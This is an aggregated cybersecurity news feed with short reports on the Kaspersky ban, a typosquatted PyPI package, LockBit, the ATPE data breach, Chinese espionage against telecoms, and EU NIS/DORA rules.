Long simmering suspicions about the loyalty of Kaspersky Software, a cybersecurity firm headquartered in Russia, came to a head this week after the U.S. government banned the sale of the company’s software, effective July 20th, to both companies and individual consumers. In addition, the U.S. Treasury Department has placed sanctions on 12 senior leaders of..

The post U.S. Bans Sale of Kaspersky Cybersecurity Software appeared first on Security Boulevard.

Ross Randall’s 3 Essential Tips to Strengthening Your District’s Multilayered Cybersecurity

✇Security Boulevard
Alexa Sander

 Recently, we hosted Ross Randall, Director of Technology at Lamar County School District in Georgia, and Tim Miles, Director of Technology at Steamboat Springs School District in Colorado, for a summer-inspired live webinar focused on fortifying your district’s multilayered cybersecurity strategy. From beach balls to firewalls, Ross and Tim generously shared their practical insights, […]

The post Ross Randall’s 3 Essential Tips to Strengthening Your District’s Multilayered Cybersecurity appeared first on ManagedMethods.

The post Ross Randall’s 3 Essential Tips to Strengthening Your District’s Multilayered Cybersecurity appeared first on Security Boulevard.

Python Developers Targeted Via Fake Crytic-Compilers Package

✇Security Boulevard
Wajahat Raja

As per recent reports, cybersecurity experts uncovered a troubling development on the Python Package Index (PyPI) – a platform used widely by developers to find and distribute Python packages. A malicious package named ‘crytic-compilers‘ was discovered, mimicking the legitimate ‘crytic-compile’ library developed by Trail of Bits. This fraudulent package was designed with sinister intent: to […]

The post Python Developers Targeted Via Fake Crytic-Compilers Package appeared first on TuxCare.

The post Python Developers Targeted Via Fake Crytic-Compilers Package appeared first on Security Boulevard.

Report Details Reemergence of Lockbit 3.0 Ransomware Syndicate

✇Security Boulevard
Michael Vizard
people pointing at laptop keyboard.

An analysis of ransomware attacks claimed to have been perpetrated by cybercriminal syndicates that was published today by NCC Group, a provider of managed security services, finds LockBit 3.0 has reemerged to claim the top spot amongst the most prominent threat actors. Previously dormant following the groups’ takedown by law enforcement officials earlier this year,..

The post Report Details Reemergence of Lockbit 3.0 Ransomware Syndicate appeared first on Security Boulevard.

Association of Texas Professional Educators Reports Data Breach Affecting Over 414,000 Members

✇Cybersecurity News and Magazine
Alan J

Association of Texas Professional Educators Data Breach

The Association of Texas Professional Educators (ATPE) is notifying more than 414,000 of its members that their personal information may have been compromised in a data breach incident that occurred earlier this year. ATPE is largest community of educators in Texas, and aims to elevate public education in the state. The association advocates for Texas educators and provides affordable, high-quality products and services, including legal and educational services. The professional organization for educators said in a recent letter that it detected suspicious activity on its network on Feb. 12 and launched an investigation with the help of a cybersecurity firm.

Association of Texas Professional Educators Data Breach

On February 12, 2024, ATPE detected abnormal activity on its network, which led to a comprehensive forensic investigation. The investigation concluded on March 20, 2024, and found evidence that some of ATPE's systems had been accessed by an unauthorized user. Based on this finding, ATPE reviewed the affected systems to identify the specific individuals and types of information that may have been compromised. The accessed information varied depending on when members joined:
  • For those who became members before May 15, 2021, the breach may have exposed names, addresses, dates of birth, Social Security numbers and medical records. Tax Identification Numbers could also possibly have been accessed if employers used them as identifiers.
  • For members who received payments from ATPE via ACH transactions, financial account information could also have been accessed.
ATPE said that while it has no evidence that anyone's information has been misused, it is notifying members "out of an abundance of caution and for purposes of full transparency."

Response to Breach Incident and Credit Offering

Since discovery of the breach, ATPE stated that it has taken several steps to secure its systems, including:
  • Disconnecting all access to its network.
  • Change of administrative credentials.
  • Installation of enhanced security safeguards on ATPE's environment and endpoints.
  • Restoration of ATPE's website in a Microsoft Azure hosted environment.
The organization said it will continue efforts to mitigate potential harm in the future. ATPE is providing affected members with free credit monitoring and identity protection services for one year through Cyberscout, a company specializing in fraud assistance. Members must enroll by Sept. 15, 2024. Details on how to activate the free services are included in the notification letters sent to members' homes. The association has also advised individuals to remain vigilant for possible incidents of identity theft and fraud, review account statements, and monitor credit reports for suspicious or unauthorized activity. ATPE said it sincerely regrets any concern or inconvenience caused by the incident but remains committed to safeguarding users' personal information. Law firm Federman & Sherwood has announced that it would conduct a separate investigation into the Association of Texas Professional Educators data breach. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Several Chinese APTs Have Been Targeting Telecommunications of Asian Country Since 2021

✇Cybersecurity News and Magazine
Alan J

Chinese Espionage Campaign

Researchers have discovered that various threat actors groups associated with Chinese state-linked espionage have been conducting a sustained hacking campaign targeting telecommunications operators in an unnamed Asian country since at least 2021. The attackers relied on custom malware and tactics tied to several China-linked espionage groups, suggesting Chinese state sponsorship.

Malware Variants Used in Chinese Espionage Campaign

Researchers from Symantec observed the use of several custom malware linked to China-based threat actors, including:
  • Coolclient: A backdoor used by the Fireant group that logs keystrokes and communicates with command servers. The campaign utilized a version delivered via a trojanized VLC media player. It is linked to the Fireant group, also known as Mustang Panda or Earth Preta.
  • Quickheal: A backdoor associated with the Needleminer group, also known as RedFoxtrot or Nomad Panda. The variant used in the campaign was nearly identical to those documented in 2021. It communicated with a command server at swiftandfast[.]net.
  • Rainyday: A backdoor tied to the Firefly group, also known as Naikon. Multiple variants were deployed using trojanized executables to sideload malicious loaders and decrypt payloads. At least one loader variant matched those linked to Firefly in 2021.
The attackers also used a variety of tactics, techniques, and procedures (TTPs) to compromise targets. These included keylogging malware that were possibly custom-developed, and port scanning tools to identify vulnerable systems. They also employed credential theft through the dumping of registry hives and exploited the Remote Desktop Protocol (RDP). Additionally, they used a publicly available tool, Responder, to act as a Link-Local Multicast Name Resolution (LLMNR), NetBIOS Name Service (NBT-NS) and multicast DNS (mDNS) poisoner. Nearly all victims in the campaign were telecoms operators, along with a services company that caters to the telecoms sector and a university in a different country in Asia. The researchers suggested that the campaign may even date as far back as the year 2020.

Campaign Motives and Attribution

The custom malware exclusively used by Fireant, Needleminer and Firefly provides strong evidence that this campaign involves Chinese state-sponsored groups. Firefly has been linked to a Chinese military intelligence unit by the U.S.-China Commission. The level of coordination between the groups involved is unclear but possibilities include independent action, personnel/tool sharing, or active collaboration. The ultimate motives behind the hacking campaign remain uncertain. Potential objectives include intelligence gathering on the telecommunications sector, eavesdropping on voice and data communications, or developing disruptive capabilities against critical infrastructure. To protect against these threats, telecom operators and other organizations should ensure they have the latest protection updates and implement robust security measures to detect and block malicious files. The researchers shared several Indicators of compromise and file hashes to help defenders detect against the campaign. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Pentagon Cybersecurity, Workforce Woes Threaten Tech Rollout – Source: www.databreachtoday.com

✇CISO2CISO.COM & CYBER SECURITY GROUP
CISO2CISO Editor 2

pentagon-cybersecurity,-workforce-woes-threaten-tech-rollout-–-source:-wwwdatabreachtoday.com

Source: www.databreachtoday.com – Author: 1 Governance & Risk Management , Government , Industry Specific New Report Says DOD Is Lagging in Procuring New Tech Amid Cybersecurity Failures Chris Riotta (@chrisriotta) • June 19, 2024     A lack of cybersecurity and software talent is slowing down the development of advanced weapons, says the Government Accountability […]

La entrada Pentagon Cybersecurity, Workforce Woes Threaten Tech Rollout – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

Europe Union Tightens Cybersecurity Grip with NIS and DORA Regulations

✇Cybersecurity News and Magazine
Samiksha Jain

European Union

The European Union has introduced two critical regulatory frameworks: the Network and Information Security (NIS) Directive and the Digital Operational Resilience Act (DORA). These measures aim to ensure that businesses of all sizes implement strong cybersecurity practices to protect sensitive information. However, industry experts suggest that the regulations’ full potential might only be realized with the involvement of third-party cybersecurity specialists.

The Growing Cyber Threat Landscape

As businesses increasingly depend on digital infrastructure to connect with clients, customize products, and enhance customer experiences, they simultaneously face heightened risks of cyberattacks. Cybercrime is projected to cost the global economy $9.5 trillion in 2024, escalating by 15% annually to reach $10.5 trillion by 2025, according to Cybersecurity Ventures. Even the most advanced cybersecurity systems can be compromised, as evidenced by a recent data breach of the United Kingdom’s Ministry of Defence payroll system, exposing the names and banking details of both current and former armed forces members.

European Union's Response: NIS and DORA

Recognizing the urgent need for stronger cybersecurity measures, the Europe Union has implemented the NIS Directive and DORA. These regulations aim to standardize and enhance cybersecurity practices across member states. NIS Directive: The NIS Directive focuses on establishing high-level, common cybersecurity best practices. It strengthens system security requirements, addresses supply chain vulnerabilities, streamlines reporting, and introduces stringent supervisory measures with potential sanctions for non-compliance. The directive was initiated in the fall of 2021 and formalized in May 2022, and businesses were given until October 2024 to comply with the new standards. DORA: DORA targets the financial sector, mandating periodic digital operational resilience testing and the implementation of management systems to monitor and report significant ICT-based incidents to relevant authorities. This regulation aims to ensure that financial entities like banks, insurance companies, and investment firms can maintain operational resilience during severe disruptions. The development of DORA involved three European Supervisory Authorities: the European Banking Authority (EBA), the European Insurance and Occupational Pensions Authority (EIOPA), and the European Securities and Markets Authority (ESMA). They established mandatory incident reporting requirements and encouraged cooperation and information sharing among financial entities and regulators to respond effectively to cybersecurity threats.

The Importance of Third-Party Assessments

Darren Humphries, Group CISO & CTO-Partner at Acora, emphasizes the need for continuous measurement of cybersecurity practices. “Risk management is moving away from art to science,” Humphries explains, highlighting the importance of metrics and documentation in meeting regulatory guidelines. He criticizes the effectiveness of self-attestation, noting that the Ministry of Defence breach partly occurred due to reliance on self-service attestation from suppliers. Instead, Humphries advocates for third-party cybersecurity specialists to evaluate and verify processes, minimizing the risk of oversight. The evolving threat landscape demands that corporations, especially those in the financial sector, become proactive in addressing potential security vulnerabilities. The new EU regulations push businesses in this direction, but they also need to leverage third-party expertise to thoroughly examine and fortify their cybersecurity frameworks. By doing so, they can better protect network transactions and comply with regulatory requirements, reducing the likelihood of cyber incidents.

Conclusion

The new EU regulations, NIS and DORA, represent a significant step forward in enhancing cybersecurity practices across Europe. However, to maximize their impact and truly safeguard against evolving cyber threats, businesses must incorporate third-party assessments and expertise. By doing so, they can ensure robust protection of sensitive information and compliance with regulatory standards, ultimately reducing their cybersecurity risks in an increasingly digital world.
❌